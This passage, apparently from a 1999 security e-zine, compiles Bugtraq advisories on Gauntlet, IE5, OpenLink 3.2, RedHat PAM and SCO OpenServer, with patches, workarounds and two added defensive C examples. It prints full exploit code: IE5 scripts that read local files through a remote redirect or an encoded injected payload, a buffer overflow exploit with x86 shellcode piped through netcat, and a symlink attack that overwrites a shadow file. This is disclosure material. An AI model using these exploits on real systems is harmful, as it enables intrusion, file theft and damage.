      internal interface of firewall. Attempt to connect to external web
      server. Access is allowed. *This is correct.*
      20) Remove http-gw from trusted network services. Apply changes.
      Attempt to connect to external web server. Access is denied. *This is
      correct.*
      
      ==Problem starts here==
      
      21) Remove proxy setting in web browser on client machine. Set
      gateway/default route on client machine to internal interface of
      firewall. Set gateway/default route on server machine to external
      interface of firewall.
      22) Clear web browser cache. Attempt to connect to external web server.
      Web page is downloaded with no logs in Gauntlet.
      23) Start ESPM-GUI. Remove all services from trusted networks services.
      Remove client machine from ESPM network group. Apply changes.
      24) FTP from client machine to server. FTP connection is made though no
      rule exists.
      25) Start telnet server on client machine. Telnet from server to client.
      Telnet connection is made.
      
      @HWA        
      
74.0  Microsoft IE5 Javascript URL Redirection Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id   722
      class        Design Error
      cve          GENERIC-MAP-NOMATCH
      remote       Yes
      local        Unknown
      published    October 18, 1999
      updated      October 18, 1999
      
      vulnerable
      
              Microsoft Internet Explorer 5.0 for Windows NT 4.0
                 + Microsoft Windows NT 4.0
              Microsoft Internet Explorer 5.0 for Windows 98
                 + Microsoft Windows 98
              Microsoft Internet Explorer 5.0 for Windows 95
                 + Microsoft Windows 95
              Microsoft Internet Explorer 5.0 for Windows 2000
                 - Microsoft Windows NT 2000.0
              Microsoft Internet Explorer 4.0.1 for Windows NT 4.0
                 - Microsoft Windows NT 4.0
              Microsoft Internet Explorer 4.0.1 for Windows 98
                 - Microsoft Windows 98
              Microsoft Internet Explorer 4.0.1 for Windows 95
                 - Microsoft Windows 95       
                 
                 
      A malicious web site operator could design a web page that, when
      visited by an IE5 user, would read a local file from the victim host (or any
      file on the victim's network to which the victim has access) and send the
      contents of that file to a designated remote location.
     
      1) In the instance noted above, the IE5 user visits a malicious web site. 
     
      2) The web site instructs the client to open another IE5 browser window
      and display the contents of a file residing on the IE5 user's host (or
      another host on the network to which the IE5 user has access). 
     
      3) Immediately after opening the new browser window, the window is
      instructed to browse to a specified web site ie: http://malicious
      server.com/hack.cgi?doit. 
     
      4) The hack.cgi?doit page does not return a web page, but instead
      redirects the window to a javascript URL containing embedded
      executable code.
     
      5) The javascript code (from step 4) can now access any files on the
      victim's host (or any file on the victim's network to which the victim has
      access) and send it to a location maintained by the malicious web site
      operator.
     
      Under normal circumstances, javascript received from a non-local
      "security zone" is not allowed to perform such actions against files on
      the local host. In this instance, however, the IE5 browser has been
      fooled (via http redirect to javascript) into thinking that the Javascript
      should execute under the security context of the local host's security
      zone as the javascript was requested from a browser displaying the
      local file.
     
      Microsoft has released a FAQ that contains a good description of this
      vulnerability:
      http://www.microsoft.com/security/bulletins/MS99-043faq.asp           
      
      From Georgi's Bugtraq post:

      <SCRIPT>
      alert("Create a short text file C:\\TEST.TXT and it will be read and shown in a dialog box");
      a=window.open("file://c:/test.txt");
      a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
      </SCRIPT>
      // "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP redirect to: "javascript:alert(document.body.innerText)"

      A demonstration of this exploit is available at:

      http://www.nat.bg/~joro/jsredir1.html
      
      credit
      This vulnerability was posted to Bugtraq by Georgi Guninski
      <joro@nat.bg> on October 18, 1999.

      reference
       advisory:
               MS99-043: Workaround Available for
               "Javascript Redirect" Vulnerability
               (MS)
               http://www.securityfocus.com/templates/advisory.html?id=1793
               
       message:
               IE 5.0 allows reading local (and from any
               domain) files and window spoofing usin
               (Georgi Guninski <joro@nat.bg>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=380B199A.3765A0D4@nat.bg
               
       web page:
               HTTP redirection to "javascript:"
               (Georgi Guninski <joro@nat.bg>)
               http://www.nat.bg/~joro/jsredir1.html
               
       web page:
               Microsoft Security Bulletin MS99-043:
               Frequently Asked Questions
               (Microsoft)
               http://www.securityfocus.com/vdb/Microsoft Security Bulletin MS99-043: Frequently Asked Questions
               
      
       To: BugTraq
       Subject: IE 5.0 allows reading local (and from any domain) files and window spoofing using HTTP redirection to "javascript:"
       Date: Mon Oct 18 1999 10:59:06
       Author: Georgi Guninski
       Message-ID: <380B199A.3765A0D4@nat.bg>
      
      
      IE 5.0 allows reading local (and from any domain) files and window
      spoofing using HTTP redirection to "javascript:"
      
      Disclaimer:
      The opinions expressed in this advisory and program are my own and not
      of any company.
      The usual standard disclaimer applies, especially the fact that Georgi
      Guninski
      is not liable for any damages caused by direct or  indirect use of the
      information or functionality provided by this program.
      Georgi Guninski, bears NO responsibility for content or misuse of this
      program or any derivatives thereof.
      
      Description:
      
      Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is
      vulnerable)
      allows reading local files and text/HTML files from any domain. Window
      spoofing is possible.
      It is also possible in some cases to read files behind firewall.
      
      Details:
      
      The problem is a HTTP redirect to "javascript:" URLs.
      If you open a local file and then change its location to a URL that
      redirects to "javascript:JavaScript code"
      then the JavaScript code is executed in the security context of the
      original local file and has access to its DOM.
      The local file may be sent to an arbitrary server.
      In a similar way one may do window spoofing.
      This vulnerability may be exploited using HTML email message or a
      newsgroup posting.
      
      The code is:
      ----------------------------------------------------------------------------------------
      <SCRIPT>
      alert("Create a short text file C:\\TEST.TXT and it will be read and shown in a dialog box");
      a=window.open("file://c:/test.txt");
      a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
      </SCRIPT>
      // "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP
      redirect to: "javascript:alert(document.body.innerText)"
      ----------------------------------------------------------------------------------------
      
      
      Workaround:
      Disable Active Scripting
      
      Demonstration is available at http://www.nat.bg/~joro/jsredir1.html
      
      Copyright 1999 Georgi Guninski
      
      Regards,
      Georgi Guninski
      http://www.nat.bg/~joro
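
      An added example, not part of the advisory or of Microsoft's fix: one
      check a filtering proxy or client could apply to the redirect described
      above, refusing any Location target whose scheme is not http or https.
      The function names and the sample responses are constructed for
      illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Return 1 if a Location value is a relative reference or an http/https
 * URL, 0 for any other scheme (javascript:, file:, ...). */
int redirect_target_allowed(const char *location)
{
    const unsigned char *p = (const unsigned char *)location;
    char scheme[8];
    size_t n = 0;
    int too_long = 0;

    if (p == NULL)
        return 0;
    while (*p != '\0' && *p <= 0x20)        /* leading spaces and controls */
        p++;
    for (; *p != '\0' && *p != ':'; p++) {
        if (*p == '\t' || *p == '\r' || *p == '\n')
            continue;                       /* URL parsers drop these bytes */
        if (*p == '/' || *p == '?' || *p == '#')
            return 1;                       /* relative: no scheme present */
        if (n + 1 < sizeof(scheme))
            scheme[n++] = (char)tolower(*p);
        else
            too_long = 1;                   /* longer than "https" */
    }
    if (*p != ':')
        return 1;                           /* relative, e.g. "page.html" */
    if (too_long)
        return 0;
    scheme[n] = '\0';
    return strcmp(scheme, "http") == 0 || strcmp(scheme, "https") == 0;
}

/* Copy the first Location header value from a raw header block into out.
 * Returns 1 if found, 0 if absent, -1 if it does not fit. */
int find_location(const char *headers, char *out, size_t cap)
{
    static const char name[] = "location:";
    const char *line = headers;

    while (line != NULL && *line != '\0') {
        size_t i = 0;
        while (name[i] != '\0' && tolower((unsigned char)line[i]) == name[i])
            i++;
        if (name[i] == '\0') {
            const char *value = line + i;
            size_t len = strcspn(value, "\r\n");
            if (len >= cap)
                return -1;
            memcpy(out, value, len);
            out[len] = '\0';
            return 1;
        }
        line = strchr(line, '\n');          /* advance to the next header */
        if (line != NULL)
            line++;
    }
    return 0;
}

/* 1 = pass the response on, 0 = block it. */
int redirect_response_allowed(const char *headers)
{
    char loc[512];
    int found;

    if (headers == NULL)
        return 0;
    found = find_location(headers, loc, sizeof(loc));
    if (found < 0)
        return 0;                           /* oversized target: refuse */
    if (found == 0)
        return 1;                           /* no redirect target at all */
    return redirect_target_allowed(loc);
}

int main(void)
{
    /* Constructed sample responses; the first mirrors the redirect the
     * advisory describes. */
    const char *samples[] = {
        "HTTP/1.0 302 Found\r\nLocation: javascript:alert(document.body.innerText)\r\n\r\n",
        "HTTP/1.0 302 Found\r\nLocation: http://www.example.test/next.html\r\n\r\n",
        "HTTP/1.0 302 Found\r\nLOCATION:  Java\tScript:alert(1)\r\n\r\n",
    };
    size_t i;

    for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("sample %lu: %s\n", (unsigned long)i,
               redirect_response_allowed(samples[i]) ? "pass" : "block");
    return 0;
}
```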
      
      @HWA         
      
75.0  OpenLink 3.2 Remote Buffer Overflow Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  720
      class       Boundary Condition Error
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       No
      published   October 15, 1999
      updated     October 18, 1999
       
       vulnerable
       
              OpenLink Software OpenLink 3.2      
               
               
      Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable
      to a remotely exploitable buffer overflow attack. The problem is in their
      web configuration utility, and is the result of an unchecked strcpy() call.
      The consequence is the execution of arbitrary code on the target host
      (running the configuration utility) with the privileges of the web software.
      
      Exploit:
      
      #include <stdio.h>
      #include <unistd.h>
      
      /*
       * Exploit for Openlink's web configurator for Linux/glibc2
       *  use: pipe through netcat to openlink web port (8000 default)
       *  ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
       *  makes www_sv execute /usr/bin/wall if you hit the address right
       *
       * For informational purposes only.  This was written to show that
       *  there's a problem, not for skr1pt k1dd33z --.
       *  don't ask me for help on how to use this to crack systems,
       *  help compiling or anything else.  It will only compile on
       *  an x86 compiler however.
       *
       * Addresses that work for me: 0xbffffb65 (initial run of the broker)
       *                             0xbffffb85 (all consecutive attempts)
       *                             probably tied to process ID www_sv runs as;
       *                             first try PIDs were in triple digits, others
       *                             4 digit PIDs.
       *
       * If this works, generally no more www_sv processes will be run as a side effect.
       */
      
      void test() {
      
      __asm__("
      
              jmp    doit
      exploit:
      
              # code basically from Aleph One's smash stacking article, with
              #  minor mods
      
              popl  %esi
              movb  $0xd0, %al            # Get a / character into %al
              xorb  $0xff, %al
              movb  %al, 0x1(%esi)        # drop /s into place
              movb  %al, 0x5(%esi)
              movb  %al, 0x9(%esi)
              xorl  %eax,%eax             # clear %eax
              movb  %eax,0xe(%esi)        # drop a 0 at end of string
              movl  %eax,0x13(%esi)       # drop NULL for environment
              leal  0x13(%esi),%edx       # point %edx to environment
              movl  %esi,0xf(%esi)        # drop pointer to argv
              leal  0xf(%esi),%ecx        # point %ecx to argv
              movl  %esi,%ebx             # point ebx to command - 1
              inc   %ebx                  # fix it to point to the right place
              movb  $0xb,%al              # index to execve syscall
              int   $0x80                 # execute it
              xorl  %ebx,%ebx            #  if exec failed, exit nicely...
              movl  %ebx,%eax
              inc   %eax
              int   $0x80
      doit:
              call exploit
              .string \"..usr.bin.wall.\"
      ");
      
      }
      
      char *shellcode = ((char *)test) + 3;
      
      char code[1000];
      
      int main(int argc, char *argv[])
      
      {
              int i;
              int left;
              unsigned char where[] = {"\0\0\0\0\0"} ;
              int *here;
              char *dummy;
              long addr;
      
      
              if (argc > 1)
                      addr = strtoul(argv[1], &dummy, 0);
              else
                      addr = 0xbffffb85;
      
              fprintf(stderr, "Setting address to %8x\n", addr);
      
              *((long *)where) = addr;
      
              strcpy(code, shellcode);
      
              for (i = 0; i < 64; i++) {
                      strcat(code, where);
              }
      
              printf("GET %s\n", code);
      
              exit(0);
      
      }
      
      Tymm Twillman suggested the following workaround in his post to
      BugTraq (linked to in the references section):

      Disable the www_sv application in oplrqb.ini. By default there is a
      section labeled Persistent Services, with the line
      "Configurator = www_sv". This section, along with the entire www_sv
      section, should be commented out with semicolons, e.g.

      ;[Persistent Services]
      ;Configurator = www_sv

      ;[www_sv]
      ;Program = w3config/www_sv
      ;Directory = w3config
      ;CommandLine =
      ;Environment = WWW_SV

      ;[Environment WWW_SV]

      OpenLink has been notified of this problem and is working on a fix.
      
      credit
      First posted to BugTraq by Tymm Twillman
      <tymm@coe.missouri.edu> on Oct 15, 1999.

      reference
       web page:
               OpenLink Homepage
               (OpenLink Software)
               http://www.openlinksw.com
       
       message:
               OpenLink 3.2 Advisory
               (Tymm Twillman <tymm@coe.missouri.edu>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.SGI.4.05.9910151747150.644081-100000@tiger.coe.missouri.edu
               
       
       To: BugTraq
       Subject: OpenLink 3.2 Advisory
       Date: Fri Oct 15 1999 05:37:36
       Author: Tymm Twillman
       Message-ID: <Pine.SGI.4.05.9910151747150.644081-100000@tiger.coe.missouri.edu>
      
      Hmm.  I wonder if I should start numbering these things now. 8)
      
      Overview:
      
      A serious security hole has been found in the web configuration utility
      that comes with OpenLink 3.2.  This hole will allow remote users to
      execute arbitrary code as the user id under which the web configurator is
      run (inherited from the request broker, oplrqb).  The hole is a
      run-of-the-mill buffer overflow, due to lack of parameter checking when
      strcpy() is used.
      
      Background:
      
      OpenLink is a database request broker, used for a generic interface to
      different database vendors' products.  By default, a web configuration
      utility is installed, which runs at port 8000.  For more information, see
      OpenLink Software's web site at http://www.openlinksw.com.
      
      Exploit:
      
      This exploit has been coded to be benign, and is just for illustration of
      the hole in the configuration utility.  Furthermore, it has not been coded
      for portability (no promises that it will function if compiled with
      anything other than egcs-2.91.66, and it will not compile on a non-x86
      compiler).  This works against the linux glibc version of OpenLink 3.2's
      configurator.  It can easily be modified for other purposes, however, and
      I have reason to believe that the majority, if not all, platforms are
      vulnerable to such an attack.
      
      A stack address may be specified on the command line (I've had luck with
      0xbffffb65, 0xbffffb85 or 0xbffffbe5).  Output of this should be piped
      through netcat, e.g.
      
      ./oplwall 0xbffffb85 | nc machine.to.hit 8000
      
      --- cut ---
      #include <stdio.h>
      #include <unistd.h>
      
      /*
       * Exploit for Openlink's web configurator for Linux/glibc2
       *  use: pipe through netcat to openlink web port (8000 default)
       *  ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
       *  makes www_sv execute /usr/bin/wall if you hit the address right
       *
       * For informational purposes only.  This was written to show that
       *  there's a problem, not for skr1pt k1dd33z --.
       *  don't ask me for help on how to use this to crack systems,
       *  help compiling or anything else.  It will only compile on
       *  an x86 compiler however.
       *
       * Addresses that work for me: 0xbffffb65 (initial run of the broker)
       *                             0xbffffb85 (all consecutive attempts)
       *                             probably tied to process ID www_sv runs as;
       *                             first try PIDs were in triple digits, others
       *                             4 digit PIDs.
       *
       * If this works, generally no more www_sv processes will be run as a side effect.
       */
      
      void test() {
      
      __asm__("
      
              jmp    doit
      exploit:
      
              # code basically from Aleph One's smash stacking article, with
              #  minor mods
      
              popl  %esi
              movb  $0xd0, %al            # Get a / character into %al
              xorb  $0xff, %al
              movb  %al, 0x1(%esi)        # drop /s into place
              movb  %al, 0x5(%esi)
              movb  %al, 0x9(%esi)
              xorl  %eax,%eax             # clear %eax
              movb  %eax,0xe(%esi)        # drop a 0 at end of string
              movl  %eax,0x13(%esi)       # drop NULL for environment
              leal  0x13(%esi),%edx       # point %edx to environment
              movl  %esi,0xf(%esi)        # drop pointer to argv
              leal  0xf(%esi),%ecx        # point %ecx to argv
              movl  %esi,%ebx             # point ebx to command - 1
              inc   %ebx                  # fix it to point to the right place
              movb  $0xb,%al              # index to execve syscall
              int   $0x80                 # execute it
              xorl  %ebx,%ebx            #  if exec failed, exit nicely...
              movl  %ebx,%eax
              inc   %eax
              int   $0x80
      doit:
              call exploit
              .string \"..usr.bin.wall.\"
      ");
      
      }
      
      char *shellcode = ((char *)test) + 3;
      
      char code[1000];
      
      int main(int argc, char *argv[])
      
      {
              int i;
              int left;
              unsigned char where[] = {"\0\0\0\0\0"} ;
              int *here;
              char *dummy;
              long addr;
      
      
              if (argc > 1)
                      addr = strtoul(argv[1], &dummy, 0);
              else
                      addr = 0xbffffb85;
      
              fprintf(stderr, "Setting address to %8x\n", addr);
      
              *((long *)where) = addr;
      
              strcpy(code, shellcode);
      
              for (i = 0; i < 64; i++) {
                      strcat(code, where);
              }
      
              printf("GET %s\n", code);
      
              exit(0);
      
      }
      
      --- cut ---
      
      Workaround:
      
      Disable the www_sv application in oplrqb.ini.  By default there is a
      section labeled Persistent Services, with the line
      "Configurator = www_sv". This section, along with the entire www_sv
      section, should be commented out with semicolons, e.g.
      
      ;[Persistent Services]
      ;Configurator = www_sv
      
      ;[www_sv]
      ;Program     = w3config/www_sv
      ;Directory   = w3config
      ;CommandLine =
      ;Environment = WWW_SV
      
      ;[Environment WWW_SV]
      
      Discussion:
      
      OpenLink software has been notified of the problem and is apparently
      working on a solution.  I have serious concerns that the package may be
      prone to other attacks, but have no confirmation of this (other than basic
      DOS attacks). My suggestion is to definitely make sure any machine running
      the OpenLink broker is well protected behind a firewall, and it should not
      allow logins from untrusted persons.
      
      Kudos to:
      
      Aleph One, for his long-lived stack smashing article, and this
      whole BugTraq thing.
      
      Hobbit, of course, for netcat.
      
      -Tymm
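
      An added example, not OpenLink's code or fix: a request-line parser of
      the kind the advisory says was missing, which checks the length and
      content of the path before copying it into a fixed buffer. The buffer
      size, the names and the sample requests are assumptions made for
      illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define REQ_PATH_MAX 256   /* assumed capacity of the handler's path buffer */

enum req_status { REQ_OK = 0, REQ_BAD = 400, REQ_TOO_LONG = 414 };

/*
 * Parse "GET <path>[ HTTP/x.y]" from a raw request line of known length.
 * Unlike an unchecked strcpy(), the path is copied only after its length
 * has been compared with the destination size, and only if every byte is
 * printable ASCII. path_out is always left NUL-terminated.
 */
enum req_status parse_request_line(const char *line, size_t line_len,
                                   char *path_out, size_t path_cap)
{
    static const char method[] = "GET ";
    const size_t mlen = sizeof(method) - 1;
    const char *p;
    size_t remaining, plen;

    if (line == NULL || path_out == NULL || path_cap == 0)
        return REQ_BAD;
    path_out[0] = '\0';

    if (line_len < mlen + 1 || memcmp(line, method, mlen) != 0)
        return REQ_BAD;

    /* The path runs up to the first space, CR, LF or the end of input. */
    p = line + mlen;
    remaining = line_len - mlen;
    for (plen = 0; plen < remaining; plen++) {
        unsigned char c = (unsigned char)p[plen];
        if (c == ' ' || c == '\r' || c == '\n')
            break;
        if (c < 0x21 || c > 0x7e)       /* NUL, control bytes, 8-bit data */
            return REQ_BAD;
    }
    if (plen == 0 || p[0] != '/')
        return REQ_BAD;
    if (plen >= path_cap)               /* keep room for the terminator */
        return REQ_TOO_LONG;

    memcpy(path_out, p, plen);
    path_out[plen] = '\0';
    return REQ_OK;
}

int main(void)
{
    /* Constructed sample requests. */
    static const char good[] = "GET /index.html HTTP/1.0\r\n";
    char oversized[1024];
    char path[REQ_PATH_MAX];

    memcpy(oversized, "GET /", 5);
    memset(oversized + 5, 'A', sizeof(oversized) - 5);

    printf("good:      %d\n",
           parse_request_line(good, sizeof(good) - 1, path, sizeof(path)));
    printf("oversized: %d\n",
           parse_request_line(oversized, sizeof(oversized), path, sizeof(path)));
    return 0;
}
```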
      
      @HWA        
      
76.0  RedHat PAM NIS Locked Accounts Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      bugtraq id   697
      class        Access Validation Error
      cve          GENERIC-MAP-NOMATCH
      remote       No
      local        Yes
      published    October 13, 1999
      updated      October 13, 1999
      vulnerable   RedHat Linux 6.1
      
      not vulnerable
              RedHat Linux 6.0.0
              RedHat Linux 5.2.0
              RedHat Linux 5.1.0
              RedHat Linux 5.0.0
              
      Under some network configurations it may be possible to access locked
      NIS accounts due to a vulnerability in the PAM authentication modules
      shipped with RedHat version 6.1. This can lead to a local compromise
      where the password is known for a locked account. RedHat 6.1 for Intel
      platforms is the only vulnerable version.        
      
      The patched versions (binary and source) are available at the location
      below:

      ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm 

      ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm
      
      credit
      Exposed in RedHat advisory "RHSA-1999:040: New PAM
      packages available", published on Oct 13, 1999.

      reference
       advisory:
               RHSA-1999:040: New PAM packages available
               (RedHat)
               http://www.securityfocus.com/templates/advisory.html?id=1789
               
               
       web page:
               Updates, Fixes, and Errata Page
               (RedHat)
               http://www.redhat.com/corp/support/errata/index.html
               
      
      RHSA-1999:040: New PAM packages available
      Published: Wed Oct 13 1999
      Updated: Wed Oct 13 1999 
      
      
      
      
      
         1. Topic: 
      
         Under some network configurations PAM (Pluggable Authentication
         Modules) will fail to lock access to disabled NIS accounts. 
      
         2. Problem description: 
      
         The PAM packages shipped with Red Hat Linux 6.1/Intel may allow access
         to locked NIS accounts on certain network configurations. If you have a Red
         Hat Linux 6.1 workstation performing authentication against a NIS server
         then you are at risk. Red Hat recommends that you upgrade the PAM
         packages on all Red Hat Linux 6.1 workstations to the versions announced in
         this advisory. 
      
         Previous versions of Red Hat Linux are not affected by this problem. 
      
         3. Bug IDs fixed (http://developer.redhat.com/bugzilla for more info): 
      
         4. Relevant releases/architectures: 
         Red Hat Linux 6.1 for i386 
      
         5. Obsoleted by: 
         N/A 
      
         6. Conflicts with: 
         N/A 
      
         7. RPMs required: 
         ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm 
         ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm 
      
         8. Solution: 
      
         For each RPM for your particular architecture, run: 
      
         rpm -Uvh <filename>
      
         where filename is the name of the RPM. 
      
         9. Verification: 
      
         MD5 sum                           Package Name
      
      
         9fd42c57d02ac039093b6f94132eee0e  SRPMS/pam-0.68-8.src.rpm
         e8d5b9edf5dc9998ee19d91b7620f2ad  i386/pam-0.68-8.i386.rpm
      
         These packages are GPG signed by Red Hat Inc. for security. Our key is
         available at: 
      
         http://www.redhat.com/corp/contact.html 
      
         You can verify each package with the following command: 
      
         rpm --checksig <filename>
      
         If you only wish to verify that each package has not been corrupted or
         tampered with, examine only the md5sum with the following command: 
      
         rpm --checksig --nogpg <filename>
      
         10. References: 
      
         Cristian 
      
         @HWA  
         
77.0  Microsoft IE5 IFRAME Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  696
      class       Access Validation Error
      cve         GENERIC-MAP-NOMATCH
      remote      Yes 
      local       No
      published   October 11, 1999
      updated     October 15, 1999
      
      vulnerable
      
              Microsoft Internet Explorer 5.0 for Windows NT 4.0
                 + Microsoft Windows NT 4.0
              Microsoft Internet Explorer 5.0 for Windows 98
                 + Microsoft Windows 98
              Microsoft Internet Explorer 5.0 for Windows 95
                 + Microsoft Windows 95
              Microsoft Internet Explorer 5.0 for Windows 2000
                 - Microsoft Windows NT 2000.0
              Microsoft Internet Explorer 4.0.1 for Windows NT 4.0
                 - Microsoft Windows NT 4.0
              Microsoft Internet Explorer 4.0.1 for Windows 98
                 - Microsoft Windows 98
              Microsoft Internet Explorer 4.0.1 for Windows 95
                 - Microsoft Windows 95
                 
       Internet Explorer 5 will allow a malicious web page to read the contents
       of local files through a weakness in the IE5 security model. Normally the
       document.execCommand method is restricted from reading and
       returning data on the local machine; however, if the method is called
       from within an IFRAME this restriction can be circumvented.          
       
       Georgi Guninski has created a demonstration, available at: 
       http://www.nat.bg/~joro/execcommand.html

       The code is as follows:
       <SCRIPT>
       alert("Create text file c:\\test.txt and it will be read");
       function f()
       {
       I1.focus();
       document.execCommand("selectAll");
       document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'");
       }
      setTimeout('f()',2000);
      </SCRIPT>
      <IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME>
      
      Microsoft has released patches for IE 4.01 and IE5. The IE 4.01 patch is included as part of
      the IE 4.01 Service Pack 2, available via:

      http://www.microsoft.com/windows/ie/download/windows.htm

      The IE5 patch is available as an individual fix from:

      Intel:
      ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe 

      Alpha:
      ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe

      The Microsoft Advisory MS 99-042 notes: "The IE5 patch also includes the
      previously-released fix for the "Download Behavior" vulnerability, discussed in
      http://www.microsoft.com/security/bulletins/ms99-040.asp."
      
      credit
      Posted to Bugtraq on October 11, 1999 by Georgi Guninski
      <joro@nat.bg>.

      reference
       advisory:
               MS99-042: Patch Available for "IFRAME
               ExecCommand" Vulnerability
               (MS)
               http://www.securityfocus.com/templates/advisory.html?id=1788
               
       message:
               IE 5.0 security vulnerability - reading local (and
               from any domain, probably win
               (Georgi Guninski <joro@nat.bg>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=38020E75.7966C579@nat.bg
               
       web page:
               Microsoft Security Bulletin (MS99-042):
               Frequently Asked Questions
               (Microsoft)
               http://www.microsoft.com/security/bulletins/MS99-042faq.asp
               
       web page:
               Q243638: Update Available for "IFRAME
               ExecCommand" Vulnerability in Internet Exp
               (Microsoft)
               http://support.microsoft.com/support/kb/articles/q243/6/38.asp
               
       To: BugTraq
       Subject: IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand
       Date: Mon Oct 11 1999 14:21:09
       Author: Georgi Guninski
       Message-ID: <38020E75.7966C579@nat.bg>
      
      
      IE 5.0 security vulnerability - reading local (and from any domain,
      probably window spoofing is possible) files using IFRAME and
      document.execCommand
      
      Disclaimer:
      The opinions expressed in this advisory and program are my own and not
      of any company.
      The usual standard disclaimer applies, especially the fact that Georgi
      Guninski
      is not liable for any damages caused by direct or  indirect use of the
      information or functionality provided by this program.
      Georgi Guninski, bears NO responsibility for content or misuse of this
      program or any derivatives thereof.
      
      Description:
      
      Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is
      vulnerable)
      allows reading local files, text and HTML files from any domain and
      probably window spoofing (have not tested window spoofing but believe it
      is possible)
      It is also possible in some cases to read files behind firewall.
      
      Details:
      
      The problem is the combination of IFRAME and document.execCommand.
      Normally, you cannot use execCommand on an IFRAME from another domain.
      But if you do:
      "IFRAME.focus(); document.execCommand" then command will be executed in
      the IFRAME
      (some commands do not work in this way, but some do and that is enough).
      So, we create an IFRAME with SRC="file://c:/test.txt" and inject
      JavaScript code in it. When the
      JavaScript code is executed, it is executed in the security context of
      the IFRAME - the "file:" protocol.
      The injection is done using the "InsertParagraph" command (guess other
      commands will do) which sets the ID of the paragraph.
      But if you place a " in the ID, then a STYLE tag may be inserted also.
      The JavaScript code is injected using the STYLE tag:
      STYLE="left:expression(eval(JSCode))"
      This vulnerability may be exploited using HTML email message or a
      newsgroup posting.
      
      The code is:
      ----------------------------------------------------------------------------------------
      <SCRIPT>
      alert("Create text file c:\\test.txt and it will be read");
      function f()
      {
      I1.focus();
      document.execCommand("selectAll");
      document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'");
      }
      setTimeout('f()',2000);
      </SCRIPT>
      <IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME>
      ----------------------------------------------------------------------------------------
      
      
      Workaround:
      Disable Active Scripting
      
      Demonstration is available at http://www.nat.bg/~joro/execcommand.html
      
      
      Regards,
      Georgi Guninski
      http://www.nat.bg/~joro
      
      @HWA         
      
78.0  SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      bugtraq id  701
      object      /etc/sysadm.d/bin/userOsa (exec)
      class       Origin Validation Error
      cve         GENERIC-MAP-NOMATCH
      remote      No
      local       Yes
      published   October 11, 1999
      updated     October 13, 1999
 
       
       
      Vulnerable
      
              SCO Open Server 5.0.5
              SCO Open Server 5.0.4
              SCO Open Server 5.0.3
              SCO Open Server 5.0.2
              SCO Open Server 5.0.1
              SCO Open Server 5.0
              
      Under certain versions of SCO OpenServer there exists a symlink
      vulnerability which can be exploited to overwrite any file which is group
      writable by the 'auth' group. The problem in particular is in the
      /etc/sysadm.d/bin/userOsa executable. When given garbage input the
      program will write out a debug log. However, the program does not
      check to see if it is overwriting a currently existing file nor whether it is
      following a symlink. Therefore it is possible to overwrite files with debug
      data which are both in the 'auth' group and are writable by the same
      group. Both /etc/shadow & /etc/passwd fall into this category. If such an
      attack were launched against these files the system would be rendered
      unusable.        
      
      As per Brock Tellier's original posting to Bugtraq:

      scohack:/tmp$ ln -s /etc/shadow.old debug.log
      scohack:/tmp$ /etc/sysadm.d/bin/userOsa
      bah
      connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
      {Invalid Connect
      Request: bah}}}
      Failed to listen to client
      Failure in making connection to OSA.
      scohack:/tmp$
     
      -----
     
      BEFORE EXPLOIT:
      scohack:/# l /etc/shadow.old
      -rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old
     
      AFTER EXPLOIT (note the file size):
      scohack:/# l /etc/shadow.old
      -rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old
     
      scohack:/# cat /etc/shadow.old
      >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by
      <PID=11604>
      <<<
